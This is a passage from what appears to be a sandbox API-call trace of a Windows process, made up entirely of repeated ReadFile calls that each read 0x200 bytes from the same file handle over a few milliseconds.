lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, 
lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.439] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.440] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.441] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, 
lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.442] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile 
(in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.443] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 
[0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.444] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, 
lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.445] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, 
lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: 
lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.446] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, 
lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.447] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.448] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, 
